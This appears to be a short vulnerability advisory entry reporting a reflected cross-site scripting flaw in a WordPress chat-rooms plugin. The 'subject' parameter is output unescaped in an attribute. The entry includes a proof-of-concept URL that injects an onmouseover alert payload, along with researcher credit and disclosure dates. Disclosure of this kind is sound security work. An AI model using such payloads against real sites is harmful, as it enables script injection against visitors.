The plugin sanitise (with sanitize_text_field) but does not escape the 'subject' parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue
https://example.com/chat-rooms/?subject=asd%22%20%22%20onmouseover=javascript:alert(1);%20test=%22&new-message=asd
Brandon Roldan
Brandon Roldan
Yes
2021-10-04 (about 1 years ago)
2021-10-04 (about 1 years ago)
2022-04-15 (about 11 months ago)